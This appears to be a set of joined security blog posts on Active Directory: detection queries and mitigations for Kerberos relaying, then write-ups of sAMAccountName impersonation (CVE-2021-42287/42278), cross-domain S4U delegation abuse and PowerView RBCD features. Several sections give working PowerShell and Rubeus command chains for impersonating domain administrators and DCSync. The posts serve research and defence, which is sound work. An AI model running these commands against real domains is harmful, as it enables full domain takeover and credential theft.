Kerberos relaying was described in detail in James Forshaws blog post “Using Kerberos for Authentication Relay Attacks”. The primary focus of Kerberos relaying is to intercept an AP-REQ and relay it to the service specified within the service principal name (SPN) used to request the service ticket (ST). The biggest discovery within James’ research is that using certain protocols a victim client can be coerced to authenticate to an attacker using Kerberos while allowing an SPN to be specified that differs from the service that the client is connecting to. This means that the client will request a ST for an SPN of the attacker’s choosing, create an AP-REQ containing that ST and send it to the attacker. The attacker can then forward this AP-REQ to the target service, disregard the resulting AP-REP (unless the attacker needs to relay this back to the client for some reason) and at this point establish an authenticated session as the victim client.

While there are other potential ways Kerberos relaying can happen, (ie. like man-in-the-middle (MITM) attacks), the primary focus of this post will be on coercing a client to authenticate to the attacker as the method of receiving the AP-REQ. The process is essentially as follows:

Attacker coerces victim client auth with target service SPN -> client requests ST to SPN specified -> client sends AP-REQ to attacker -> attacker extracts AP-REQ sends to target service -> attacker establishes session as victim client

There are some caveat’s to this process. The first being protections enabled on the target service. As with NTLM relaying, if the target service has signing/sealing or channel binding enforced, relaying Kerberos authentication will not work. The second caveat is the protections supported by the client. With some target protocols, if the client indicates support for certain protections, the server will enable those protections, again making Kerberos relaying not possible without some other bug in the implementation.

Potential Attack Paths with Kerberos Relay

There are several potential attack paths that Kerberos relaying allows for. Many of these were documented by James in his initial blog post. As alluded to previously, there are 2 main considerations when discussing Kerberos relaying attack paths:

  1. The protocol used to trigger the authentication from the victim client
  2. The protocol used by the service the authentication is being relayed to

Trigger Protocol

As discussed, the main requirement for the trigger protocol is the ability for the attacker to specify an arbitrary SPN, or at least a partially attacker controlled SPN, when triggering the authentication. Protocols known to potentially have this requirement are:

  • IPSec and AuthIP
  • MSRPC
  • DCOM
  • HTTP
  • LLMNR
  • MDNS

Service Protocol

Depending on the protections enabled on the server, the following protocols are known to be target service protocols for Kerberos relaying:

  • LDAP/LDAPS
  • HTTP
  • SMB

Potentially many combinations of these protocols could be used as attack paths for Kerberos relaying. This presents many attack paths, for instance, relaying to an LDAP server could allow for modification of LDAP objects or relaying to an AD CS HTTP web enrolment endpoint could allow for requesting an authentication certificate.

Detecting Kerberos Relay

Before diving straight into detections, queries, and indicators of activity for these behaviors we think it is important to touch on what we are looking at for detection and why. It is fairly easy to take a tool that performs some behavior then immediately go look at the logs to see what telemetry exists. This isn’t a terrible approach, it just isn’t the only one and not the one we take.

We (Charlie, Andrew, and Jonny) like to approach this detection piece a little differently by breaking up a tool’s capability, understanding what it is trying to accomplish, understanding the technologies tied to an attack and their capabilities, and identifying what actions (if any) apply to other techniques. We then like to find the core behavior the attack is built on and identify what pieces of that action is or can be controlled by an attacker. This process helps us identify which behaviors are explicitly tied to the attack and which might relate to an action that was performed prior to the attack or after. One thing we don’t want to do is create detection explicitly tied to the tool, but to the attack. We are using the tool as a starting point of understanding the attack and the various variants an attacker may take to accomplish these actions.

That being said, every attack will have a pre, intra, and post action. These actions are extracted during the research process and help us scope what capabilities we are trying to detect. Let us explain.

In order for an attack to be run, an attacker must do something that gives them the ability to perform that action. This could be a number of things, let’s use the following as an example of pre-action activity:

  • Gain access to a domain user
  • Compromise/obtain a foothold on a box
  • Run a LDAP query for reconnaissance
  • Escalate to a local administrator/High IL

You then have the actual attack (intra-action):

  • Kerberoast
  • Dump LSASS
  • Access Token Impersonation

Finally, the attacker is going to do something with whatever output the attack gives them — being the post-action:

  • Logs on as user
  • Impersonates user

Here is a visual representation of this:

This allows us to apply a detection layering approach when creating detections for these behaviors because there is going to be something within the pre-action that we can relate to the intra-action, and similarly the intra-action to the post-action. Due to this we can change the diagram up a little bit:

As you can probably tell by now, every post-action leads into a pre-action. It restarts the attack flow. We see this below with Kerberos Relay. One potential post-action is to perform S4U2Self/S4U2Proxy. Kerberos Relay has now become a pre-action to this activity and a post-action could be that an attacker is using that ability to login, talk to the SCM to create a service and run a process as SYSTEM.

If we just run the attack and look directly at the logs it is easy to start making assumptions. So before we run the attack we can break out what we are looking for, then go look for it. This allows us to truly understand what layer we are applying a detection, which inherently will help us understand what level of coverage we have.

We can now apply this to Kerberos Relay in the next section.

Detection Queries

Some of the attacks within the pre/intra/post actions were applied due to how KrbRelayUp was exploiting this activity. The attacker doesn’t always have to take these exact paths and some of the specifics may change, for example — below we show a detection for the COM server initialization/TCP connection. An attacker could use a different protocol like HTTP/LDAP. Although we didn’t create queries for each one of these scenarios we wanted to share the different pre/intra/post-action detections someone could create.

Pre-Kerberos Relay Detections:

  • Initial domain user foothold (No detection added as there are so many options)
  • LDAP queries to identify potential SPNs available
  • Computer account added via LDAP (Using Microsoft Defender for Endpoint DeviceEvents)
1
2
3
4
5
DeviceEvents
| where ActionType containsLdapSearchand (InitiatingProcessParentFileName !has (“services.exe”) or InitiatingProcessAccountName !in (“local service”, “system”))
| extend SearchFilter= extractjson(“$.SearchFilter”, AdditionalFields)
| where SearchFilter containssAMAccountNameand SearchFilter contains “$”
| summarize count() by Timestamp, InitiatingProcessAccountName,InitiatingProcessParentFileName, InitiatingProcessFileName, SearchFilter, InitiatingProcessCommandLine, AdditionalFields, InitiatingProcessLogonId

Note: This query was created via MDE and will look for when a computer account is created via LDAP, for this attack this is totally optional. To perform this specific attack path, the attacker only requires the credentials of any computer object or a user object with an SPN. There are many other ways to potentially obtain one.

  • Computer Account added via Splunk and Window Security Event ID 4741:
1
index=windows sourcetype=Security EventCode=4741 AND SAM_Account_Name = “*$”

Going a step further would be to correlate the 4741 with Windows Security Event ID 4673. As Andrew wrote in his post the event details in 4673 contain the four (4) SPN’s that are also created when a computer account is created with certain attack tools (in their present state as of writing this post). Kevin Robertson first blogged about the 4 SPN’s being generated in his post, “MachineAccountQuota is USEFUL Sometimes: Exploiting One of Active Directory’s Oddest Settings.” Many publicly available Open Source Tools (OSTs) incorporate the same 4 SPNs into their tooling.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
index=windows (EventCode=4741 MSADChangedAttributes=*(*HOST/*) AND *(*RestrictedKrbHost/*) New_UAC_Value=0x80) OR (EventCode=4673 Privileges=SeMachineAccountPrivilege) 
| eventstats values(Process_Name),values(Privileges),values(EventCode) as EventCode by Logon_ID 
| search EventCode=4741
| rex field=_raw “(Message=(?<Message>[a-zA-z ].*))” 
| eval datetime=strftime(_time, “%m-%d-%Y %H:%M:%S.%Q”) 
| stats count values(datetime),values(Process_Name),values(Privileges),values(EventCode),values(MSADChangedAttributes),values(Message),values(Account_Domain),values(Security_ID),values(SAM_Account_Name),values(DNS_Host_Name) by Logon_ID 
| search count >=2 
| rename values(*) as * 
| eval Effecting_Account=mvindex(Security_ID,1) 
| eval New_Computer_Account_Name=mvindex(Security_ID,0) 
| table datetime,Account_Domain,Effecting_Account,Logon_ID,New_Computer_Account_Name,DNS_Host_Name,Message,MSADChangedAttributes,Process_Name,Privileges,EventCode

Intra-Kerberos Relay Detections:

  • DCOM Server connection with TCP connection to localhost (Using Splunk and Window Security Event ID 5156):
1
index=windows sourcetype=Security EventCode=5156 Direction=Inbound AND Source_Address=::1 AND Destination_Address=::1 AND Process_ID !=4 AND Protocol=6

Post-Kerberos Relay Detections:

  • RBCD Exploitation (Using Splunk and Window Security Event ID 5136/4768/4769)
1
2
3
4
5
6
7
8
index=windows sourcetype=”Security” ((EventCode=5136 AND “msDS-AllowedToActOnBehalfOfOtherIdentity”) AND (Type=”Value Added” OR Type=”Value Deleted”)) OR EventCode=4768 OR EventCode=4769 
| eval alt_type=mvindex(Type,2) 
| eval datetime=strftime(_time, “%m-%d-%Y %H:%M:%S.%Q”) 
| bucket _time span=11m
| stats dc(EventCode) as eventcodes,values(EventCode),values(datetime),values(LDAP_Display_Name),values(host),values(Account_Domain),values(Client_Address),values(Service_Name),values(Service_ID),values(Ticket_Options),values(Class),values(Ticket_Encryption_Type),values(alt_type) by _time 
| rename values(*) as *
| where eventcodes >=3
| table _time,datetime,host,Account_Domain,Client_Address,Service_Name,Service_ID,Ticket_Options,Ticket_Encryption_Type,Class,LDAP_Display_Name,alt_type,EventCode,eventcodes

It should be noted that this detection query has limitations given its use of bucket _time span. We employed the use of this time feature as there was not an easy way (i.e. by Logon ID) to correlate the three events. The only common variable we discovered between these three different events observed was time, specifically all within a 15 second window. While this query worked in our lab with our specific dataset, we would like to point out that by grouping the events by time in a bucket, events can possibly occur outside the span of the bucket as we don’t know WHEN the event will take place. As such the event could occur in the middle of the bucket or it could be on the “edge.” A thank you to Greg Rivas for helping create the above SPL query.

During the writing of this post the author of KrbRelayUp added support for Shadow Credentials, which performs slightly different post-actions than we have specified above. However; it is good to note that Shadow Credentials is still a post-action potential attack that can be leveraged.

Mitigations

  1. Limit MAQ attribute and/or restrict the SeMachineAccountPrivilege to a specific group rather than Authenticated Users
  2. Extended Protection for Authentication (EPA)/Protocol Signing/Sealing and Channel Binding
  3. Disabling mDNS/LLMNR
  4. Require authenticated IPsec/IKEv2
  5. Disabling Disable NTLM

A thank you to James Forshaw for vocalizing some of these mitigations when introducing this attack.

Conclusion

During this write-up we wanted to give a brief explanation of Kerberos Relay, how this can be exploited, and the various levels of detection/prevention that could be applied. Although we didn’t go over every pre/post-exploitation scenario an attacker could take, we wanted to highlight the importance of thinking about attacks from a pre/intra/post-action perspective. This helps us identify the scope of our detections, which will then allow us to identify at what depth we are applying the detection.

We hope this was helpful and a huge thank you to James Forshaw again for his previous work on this.

References

  • https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
  • https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html
  • https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/
  • https://github.com/Dec0ne/KrbRelayUp
  • https://github.com/cube0x0/KrbRelay

More sAMAccountName Impersonation

So in my excitement to put out the previous post I forgot something and since then I've thought of another attack path that may come in useful for some people.

For these examples I'm using the internal.user account in the internal.zeroday.lab domain, as shown below:

This is just a generic low privileged user.

Trusts

I did reply to my tweet afterwards, but I thought it'd be best to explain a little more that this works across trusts.

As mentioned in a previous post I did, creating machine accounts across trusts is not only possible but can be incredibly useful. This is another example of that.

A forest trust is configured between the internal.zeroday.lab and external.zeroday.lab forests:

A new machine account (named NewComputer) is created across this trust on the external.zeroday.lab domain:

The SPNs can be cleared from this newly created account:

It's best to get the distinguishedname of the machine account for changing the name:

Lastly, the name can be changed to the same as the domain controller minus the '$':

At this point the attack is exactly the same as the initial example I gave in the original post, ie. request a TGT for EDC1, rename machine account back, perform S4U2self.

User Account

Another example of exploitation involved user account control. 2 more prerequisites are required to perform the attack using a user account, The GenericAll privilege over the user account and access to the account credential. Any user account can be used to perform the attack.

There are several potential ways of obtaining the user account password when you have GenericAll over it, including tageted Kerberoasting from Will Schroeder, Shadow Credentials by Elad Shamir, just resetting the user password and probably more I'm forgetting right now. Point is, I'm not going to go into all of the potential ways you might do this, I'm just going to assume the password has been obtained.

So the user I'm running as (internal.user) has GenericAll over the target user (new.user):

Changing the samaccountname to that of the DC minus the '$' is also possible using PowerView:

The attack from this point is exactly the same as in the original post, I'm not going to duplicate all of that here, you can try it for yourself if you want. Interestingly on patched servers you can rename a user account this way with GenericAll over it, but the S4U2self part fails with KDC_ERR_TGT_REVOKED error due to the new Requestor PAC_INFO_BUFFER being included within the TGT's PAC.

EDIT: Charlie BROMBERG suggested GenericAll isn't actually required and this works with GenericWrite or even WriteProperty on sAMAccountName for changing the samaccountname, but it is important to remember that the ability to request a TGT for this account is required too, so the higher the privileges, the more likely you are to be able to do this.

Conclusion

It is very important that all domain controllers throughout the whole enterprise is patched against these issues due to the impact of exploitation and the ease with which it can be performed.

While more limited, it may still be possible in situations where a machine account cannot be created/controlled or renaming of machine account fails.

CVE-2021-42287/CVE-2021-42278 Weaponisation

So on 9th November 2021, Cliff Fisher tweeted about a bunch of CVE's to do with Active Directory that caught a lot of people's eyes. These included CVE-2021-42278, CVE-2021-42291, CVE-2021-42287 and CVE-2021-42282. The one that caught my eye the most was CVE-2021-42287 as it related to PAC confusion and impersonation of domain controllers, also having just worked on PAC forging with Rubeus 2.0.

This post discusses my quest to figure out how to exploit this issue and some things I discovered along the way.

I just want to highlight that there's no new research here, this issue was discovered by Andrew Bartlett of Catalyst IT. I just found one way to weaponise it, there may well be others in the issues he found.

A Little Digging

So immediately upon seeing Cliff's tweet, Ceri Coburn and I started tryng to figure out how this could be exploited. We (perhaps incorrectly) latched onto the text on Microsofts description of CVE-2021-42287 which seemed to be based around the idea of TGT's being issued without PACs. This led me to modify Rubeus to allow for requesting TGT's without a PAC.

After Ceri debugging the Windows KDC and us digging through the leaked XP source we were convinced that to trigger the codepath we needed to go down (to insert a PAC into a ST when it was requested with a TGT lacking a PAC) required a cross domain S4U2self but was unable to get it to work. The only way we could get a DC to add a PAC when an service ticket (ST) was requested using a TGT without a PAC was by configuring altSecurityIdentities.

This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] to impersonate that user.

So below you can see a low privileged user (internal.user) of the local doamin (internal.zeroday.lab) has GenericAll over a high privileged user (external.admin) of a different domain (external.zeroday.lab):

As this user we can add ourselves to the altSecurityIdentities attribute as shown below:

Now we can get a TGT from our local DC and request it without a PAC using the new /nopac switch:

This results in an obviously small TGT. We then use that TGT to request a referral to the target domain (external.zeroday.lab) from our local DC:

That referral can then be used to request ST's for services on our target domain (external.zeroday.lab). Here I'm requesting a ST for LDAP/EDC1.external.zeroday.lab the DC's LDAP service:

The size of the ST is very large compared to the previous 2 tickets, this is because (as we'll see) a PAC has been added. As shown in the klist output below, this ST is for the original user internal.user which has no special privileges on either domain:

Using this ST, however, we can DCSync:

So what happened here is the DC has searched for the account in the local database, it hasn't found it so it's then searched to see if any accounts have this account listed in their AltSecurityIdentities attribute, which external.admin does because we added it earlier, and if so, the DC adds a PAC belonging to that account. This can be verified using Rubeus' describe command and the AES256 key we just DCsync'd:

We now effectly have the privileges of the external.admin user on the external.zeroday.lab domain.

This didn't help us exploiting the issue we wanted but I did find it interesting.

Some Progress

Then along came this tweet from Clément Notin which actually mentioned the Samba information regarding these issues and led me to CVE-2020-25719 and this patch. What particularly caught my attention was this paragraph:

Delegated administrators with the right to create other user or machine accounts can abuse the race between the time of ticket issue and the time of presentation (back to the AD DC) to impersonate a different account, including a highly privileged account.

Suddenly I realised that to make the local lookup fail, we didn't need to attack a foreign domain but perhaps remove the account after retrieving the TGT.

I started playing with naming a machine account the same as the local DC (minus the $), requesting a TGT (still without a PAC), removing the machine account and using that TGT. I noticed something funny.

When using this PAC-less TGT with a U2U request but without supplying an additional ticket, it was failing to decrypt the resulting ST:

The U2U ST should be encrypted with the session of within the provided TGT but as I didn't provide an additional ticket I assumed it was triyng to lookup the account based on the sname which I was setting to IDC1 the samaccountname of my now missing machine account. I had the idea to try decrypting this ST using the long term key of the domain controller that I was naming my machine account after (IDC1$):

It worked! It sucessfuly decrypted the ST, it just couldn't find the PAC because there wasn't one there. I tried the same thing using S4U2self and got the same result, the DC was looking for my IDC1 account, not finding it and then search for the same but adding a $ on the end, finding the domain controller account and encrypting the ticket using it's key instead.

At that time I still couldn't figure out why it wasn't adding the PAC, so I decided to try requesting the initial TGT with a PAC instead of without a PAC and surprisingly it worked! So apparently there was no need to request a TGT without a PAC, supplying a TGT with a PAC for an account that has the samaccountname of the DC minus the $ to a request for an S4U2self ticket, when the intial account no longer exists, results in the ST being encrypted using the key of the DC.

The sname of that resulting ST can be modified as per Alberto Solino's post here. So it can be used to authenticate against any service on the target box, even users protected from delegation, as Elad Shamir mentions in the Solving a Sensitive Problem section of Wagging the Dog.

The last thing to work out was how can we get a machine account in this state from a low privileged user, as until now I was manually modifying the machine account as an admin. Thankfully Kevin Robertson's amazing post on the Macine Account Quota helped massively. It explains that the creator of the machine account has control over various attributes including the samAccountName and ServicePrincipalName. Another problem I was running into was trying to change the samaccountname, as trying to change it to be the same as the DC minus the $, I was getting the following error:

As Kevin mentions in his post:

If you modify the samAccountName, DnsHostname, or msDS-AdditionalDnsHostName attributes, the SPN list will automatically update with the new values.

So the SPN it was trying to set was already an SPN belonging to the target DC. Ceri suggested removing the SPNs before changing the samaccountname, which worked.

Lastly, until now I was removing the machine account after requesting the TGT (which requires admin privileges), I had to test whether disabling it or renaming it worked too. Disabling it resulted in a S_PRINCIPAL_UNKNOWN error being returned by the DC when requesting the S4U2self but renaming it worked.

Finally all of the pieces were in place.

Checking If Exploitable

To exploit this requires 3 things, at least 1 DC not patched with either KB5008380 or KB5008602, any valid domain user account and a Machine Account Quota (MAQ) above 0.

To determine if a DC is patched is very easy. Using my additional /nopac switch to Rubeus' asktgt, request a TGT without a PAC, if the DC is vulnerable it'll look like the following:

Look at the size of the returned TGT. If the DC is not vulnerable the TGT will look as follows:

The size difference is immediately obvious. The next thing to check would be the MAQ:

By default it is 10 as above but can be changed, anything above 0 will do. Lastly we need to check the SeMachineAccountPrivilege which is granted to Authenticated Users by default:

If everything checks out, we can exploit this issue.

The Full Attack

The first step is to create a machine account we can use for the attack (The account I create is called TestSPN$). Kevin's Powermad works nicely for this:

After this, PowerView's Set-DomainObject can be used to clear the SPNs from the machine account:

Changing the machine account's samaccountname can be done using Powermad's Set-MachineAccountAttribute (Here I'm changing it to IDC1, because the DC's samaccountname is IDC1$):

Rubeus' asktgt can be leveraged to request a TGT for that newly created machine account (This is just a normal TGT for the machine we just created but using it's new samaccontname):

Set-MachineAccountAttribute can again be used to change the machine accounts samaccountname (either back to what it was or something else entirely, it doesn't matter):

With the machine account renamed, it is now possible to request an S4U2self ticket using the retrieved TGT and get an ST encrypted with the DC's key, at the same time we can rewrite the sname within the ticket to be the LDAP service:

Here, I've impersonated the Administrator user for the LDAP service on the DC. It's worth noting that this could be any user on any service on any system on the domain.

The ticket has been sucessfully injected into LSA as shown below:

Using that ticket it is now possible to DCSync:

The commands I run to do this are shown below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# Create Machine Account
New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose

# Clear SPNs
Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose

# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose

# Request TGT
.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap

# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose

# Request S4U2self
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]

Mitigation / Detection

The best way to mitigate against this is to install the Microsoft patch (KB5008602), this patch fixes the issue with PAC confusion as well as fixes this issue with S4U2self created by the earlier KB5008380 patch.

Setting the Machine Account Quota to 0 is a quick and easy fix for stopping low privileged user from being able to create machine accounts, another related fix is to remove Authenticated Users from the SeMachineAccountPrivilege and adding Domain Admins or another group of allowed accounts.

There are several Events caused by various steps which would be useful for determining attempts to perform this attack. The credit for determining these Events should go entirely to Andrew Schwartz, I simply sent my logs to him after I performed the attack.

Machine Account Creation

Firstly, there is a 5156 event of an inbound connection to LDAP to create the machine account, For this event ID Andrew leveraged the research of “A Voyage to Uncovering Telemetry: Identifying RPC Telemetry for Detection Engineers” By: Jonathan Johnson:

Immediately followed by a 4673 event, which is the usage of the SeMachineAccountPrivilege:

As well as a 4741 event, describing the creation of the machine account:

And a 4724 event, regarding the password reset of the newly create machine account:

Clearing The SPNs

Next a 4742 event can be seen when the SPNs are removed from the machine account, this will show for the Service Principal Names field, as shown below:

Changing the SamAccountName

A 4742 event will also show when the SAM Account Name is changed, and the new name will be shown in the SAM Account Name field:

More interestingly, a 4781 event will show both the old account name and the new account name:

Get TGT

When retrieving the TGT, a 4768 event will show, interestingly the Account Name field will show the new name of the account, while the User ID field will show the old name:

Then the account name change happens again with the 2 events mentioned above.

S4U2self

Lastly, as Elad mentions in his Wagging the Dog post, event 4769 fires, this time, however, some discrepancy is shown between Account Name and Service Name, while the Service Name field has the proper machine account name, the Account Name is missing the trailing dollar ($):

Conclusion

With the November 9th updates, many changes were made to AD and I wouldn't be surprised if many other avenues existed using those issues but the one I use directly from a low privileged user to full domain takeover with a default configuration.

Ensuring all DC's are fully patched should be the main priority here as it will only take 1 unpatched DC for domain takeover to be possible.

On top of patching, proper AD hardening with decent monitoring will always minimise the impact of any compromise significantly.

Another Delegation Edge Case

While coding the cross domain S4U into Rubeus I only really considered the situation where the user that was to be impersonated was in the target/foreign domain, but not if the user was in the source/local domain. After looking at how the process of requesting delegation worked when impersonating a user on the local domain, I decided to write this post detailing how it works and when it might be useful.

The information in this post is reasonably complex and I won't be going over previous work on how S4U works, the best places to see this is probably the Microsoft Documentation and Elad Shamir's post. It might also be helpful to check out my original post on cross domain S4U if you haven't already.

So let's get to it.

The Standard Process

I've created a diagram for showing how these tickets are requested when the OS performs this type of delegation:

This can understandably look a little intimidating, so let's break it down:

  1. The service account gets its standard TGT from the local DC, this is nothing interesting and included for the sake of completion. (1 and 2)

  2. The account connects to the service accounts SPN using a standard service ticket, which is forwardable. (3)

  3. The service account uses its TGT to request a referral TGT from the local DC for the foreign domain where the end service resides (krbtgt/Domain2). (4 and 5)

  4. The service account uses its TGT, with the standard service ticket (provided by the connecting account) as an additional ticket, to request a service ticket for the end service SPN from the local DC. This results in what I'm calling a delegated referral TGT for the foreign domain being issued by the local DC. (6 and 7)

  5. The service account uses its referral TGT to request a service ticket for itself for the end service from the foreign DC. (8 and 9)

  6. The service account finally requests the delegated service ticket for the end service as the connecting user account from the foreign DC using the service accounts referral TGT and the delegated referral TGT (obtained in step 4 in this list or 6 and 7 in the image) as an additional ticket. (10 and 11)

From this we can determine that the main thing that is required to impersonate a local account on a service on a foreign domain is a forwardable service ticket from that account.

With this in mind, I decided to try to find a scenario this might be useful in.

The Situation

The following diagram shows the relevant part of the lab setup for this demonstration:

The position we are currently in is we have compromised the low privileged user child.user in the child domain child1.internal.zeroday.lab.

For the sake of simplicity, this user has an SPN set:

There are many ways to obtain an account with an SPN, including creating a machine account, compromising an account with an SPN, adding an SPN to an account you have Write privileges on. The other important thing here is that the user child.user has GenericWrite privileges on the machine account ISQL1 on the parent domain (internal.zeroday.lab):

The last thing to note here is the machine account quota for the parent domain (internal.zeroday.lab) is set to 0:

So there's no creating machine accounts to hop across the trust, as I demonstrated in a previous blog post.

Gaining Access to ISQL1

Due to having GenericWrite privileges on ISQL1 it is possible to configure resource-based constrained delegation (RBCD) to allow ourselves the ability to delegate to it:

At this point child1.internal.zeroday.lab\child.user can delegate to internal.zeroday.lab\ISQL1$.

The first thing we might try is to delegate to an administrative user on the foreign domain (internal.zeroday.lab), internal.admin is a member of the Domain Admins group so might be a good option. Using the Rubeus additions I did here I can try the following command to impersonate internal.admin:

1
Rubeus.exe s4u /user:child.user /rc4:C4B0E1B10C7CE2C4723B4E2407EF81A2 /domain:child1.internal.zeroday.lab /dc:ic1dc1.child1.internal.zeroday.lab /impersonateuser:internal.admin /targetdomain:internal.zeroday.lab /targetdc:idc1.internal.zeroday.lab /msdsspn:CIFS/ISQL1.internal.zeroday.lab /nowrap

This results in a KDC_ERR_BADOPTION error, as shown below:

We can see the reason for this by looking at the S4U2Self ticket returned by the local DC (IC1DC1.child1.internal.zeroday.lab) with Rubeus' describe command:

This ticket does not have the forwardable flag set, meaning it can't be used to perform the S4U2Proxy extension. Looking at the user internal.admin we can see that it is protected from delegation:

So the question becomes, what can we do if all users in the foreign domain with the desired privileges on the target system are protected from delegation? Well, there are several potential attack paths but the one we're going to focus on here is impersonating a user in the local domain that has administrative privileges on the target system. Again for simplicity sake, I've just added a user (child1.internal.zeroday.lab\sql.admin) to the local Administrators group on ISQL1:

With what we know about the process of obtaining a service ticket for child1.internal.zeroday.lab\sql.admin to internal.zeroday.lab\ISQL1, all we require is a forwardable service ticket to our account (child1.internal.zeroday.lab\child.user). Using a trick Elad mentions in the A Forwardable Result section of his Wagging the Dog post, all service tickets produced by S4U2Proxy is always forwardable.

This means that providing the user sql.admin can be delegated (shown below), we can obtain a forwardable service ticket using RBCD.

So configuring RBCD on ourselves (child.user) so we can delegate to ourselves:

The following Rubeus command was used to retrieve a forwardable service ticket as the user sql.admin for the SPN blah/foobar (just a junk one for demonstration purposes) which belongs to the account child.user:

1
Rubeus.exe s4u /user:child.user /rc4:C4B0E1B10C7CE2C4723B4E2407EF81A2 /domain:child1.internal.zeroday.lab /dc:ic1dc1.child1.internal.zeroday.lab /impersonateuser:sql.admin /msdsspn:blah/foobar /nowrap

Using Rubeus' describe command shows that this ticket is forwardable:

Now everything is in place to gain access to the remote system ISQL1. The following requests is the process in full described earlier to obtain the desired delegated service ticket for CIFS/ISQL1.internal.zeroday.lab as the user child1.internal.zeroday.lab, with any requests not required omitted. Each request, except gaining the TGT initially, are made manually using the asktgs Rubeus command.

Firstly the TGT for the service account (child.user) is required:

We already have the forwardable service ticket to child.user, so we don't need to worry about that. Next we have to obtain a referral TGT as the service account (child.user) for the foreign domain (internal.zeroday.lab), for this we only require the TGT just obtained. We can use the following command for that:

1
Rubeus.exe asktgs /service:krbtgt/internal.zeroday.lab /dc:ic1dc1.child1.internal.zeroday.lab /nowrap /ticket:doIFq...(snip)...

The last thing we require from the local DC is the delegated referral TGT, to get this I made another PR to Rubeus which allows for including additional tickets when using asktgs by providing the /tgs:X argument. Using the following command and including the primary TGT for the service account (child.user) as the /ticket:X argument and the forwardable service ticket as the /tgs:X argument, it is possible to request this delegated referral TGT:

1
Rubeus.exe asktgs /service:CIFS/ISQL1.internal.zeroday.lab /nowrap /dc:ic1dc1.child1.internal.zeroday.lab /ticket:doIFqjCCB...(snip)... /tgs:doIGPDCCB...(snip)...

We can skip requesting a service ticket for the end service using only the referral TGT for child.user as we won't be using that ticket. The last thing we need to do it request the final service ticket for CIFS/ISQL1.internal.zeroday.lab from the DC for the domain internal.zeroday.lab (IDC1.internal.zeroday.lab), this is the ticket we can use to impersonate sql.admin on the target service. To do this we use a similar command to the one we just run, except instead of the TGT and fowardable service ticket, we use the referral TGT and delegated referral TGT, and instead of the local DC we request it from the foreign DC, you also have to pass Rubeus the /usesvcdomain switch because cross-domain stuff is hard:

1
Rubeus.exe asktgs /service:CIFS/ISQL1.internal.zeroday.lab /nowrap /dc:idc1.internal.zeroday.lab /usesvcdomain /ticket:doIFpjCCB...(snip)... /tgs:doIHJjCCB...(snip)...

And finally we get the service ticket we're after:

Using this ticket gives as access to the CIFS service on the target ISQL1:

Conclusion

While this attack path is probably not normally required, due to other easier attack paths being likely possible, it does show that unsual edge cases exist that could allow for privilege escalation within a domain or even across domain trusts. Defenders should therefore ensure that they are fully aware of the configuration of their whole enterprise and the implications any of those configurations could have on the security of the infrastructure as a whole.

PowerView - A New Hope

I'd been wanting to add some features to PowerView for a while, it's arguably the tool I use most on infrastructure assessments, and when @harmj0y officially discontinued PowerSploit I decided to fork it and start adding them.

For anyone that doesn't know, PowerView is an amazing tool written in PowerShell that can be used for playing with Active Directory and particually performing recon of Active Directory.

This post is about some new features I've added to it. My forked version can be found here.

RBCD Support

Until now dealing with RBCD (or the msds-allowedtoactonbehalfofotheridentity attribute) using PowerView was a manual process. Using Security.AccessControl.RawSecurityDescriptor with an security descriptor definition language (SDDL) string as an argument and manually converting it, as documented here and here.

I wanted to automate this so I created the Get-DomainRBCD and Set-DomainRBCD functions.

Get-DomainRBCD

Get-DomainRBCD by default finds all accounts, user and computer, that have the msds-allowedtoactonbehalfofotheridentity. It returns a custom PS object where the SID's have been resolved if possible. If identities are specified then only the RBCD configuration of those identities are returned:

It also tells you whether the account (either source account or account that's been granted delegation rights) is a user or machine account. This is useful to know because only 1 type of account can be configured on the msds-allowedtoactonbehalfofotheridentity security descriptor at once. So either all computer accounts or all user accounts, but a mixture of the 2.

Set-DomainRBCD

To compliment Get-DomainRBCD, I created Set-DomainRBCD, which can be used to configured RBCD on an account.

The Identity parameter is the account(s) where RBCD is to be configured, it can be done on multiple accounts at once and works the same way as in the other PowerView functions, like Get-DomainUser. The DelegateFrom parameter is a pipe ('|') delimited list of identities to delegate access to. The argument to DelegateFrom can be any format also supported by the Identity parameter:

Configuring RBCD the same as in the previous screenshot can be done like this:

Here, I configure RBCD on the computer account ISQL1 and delegate access to ISQL1 and ISQL2. This results in the same configured shown previously:

Finally, it is possible to easily remove this configuration using the -Clear switch to Set-DomainRBCD:

This makes dealing with RBCD using only PowerView much easier.

Ownership

A small addition to the Get-DomainUser function in PowerView was the -Owner switch. With this switch it return 2 extra object members, OwnerSID and OwnerName:

As shown here, the owner of the testsd user has the SID of S-1-5-21-2042794111-3163024120-2630140754-512 and the SamAccountName of Domain Admins. This is important for the next section.

Security Descriptors

While coding Set-DomainRBCD I realised that the msds-allowedtoactonbehalfofotheridentity attribute is just a security descriptor (SD) and it reminded me of a conversation I had in the BloodHound slack regarding the AdminCount attribute.

As discussed here members of protected groups have their AdminCount attribute set to 1 by the SD Propagator (SDProp). At the same time the security descriptor (SD) from AdminSDHolder gets applied, which is basically a hardened SD for protected objects. The problem here is that when the object is removed from having protected status, the AdminCount attribute value as well as the hardened SD remains.

It is often required to escalate accounts during assessments to perform certain attack paths, but it is always best to leave the client infrastructure in as similar state as before the assessment. So a method of viewing and restoring object SD's was required.

Enter Get-DomainObjectSD and Set-DomainObjectSD.

Get-DomainObjectSD

Get-DomainObjectSD can be used to retrieve an object's SD. By default it will output a custom PS object with 2 members (ObjectSID and ObjectSDDL).

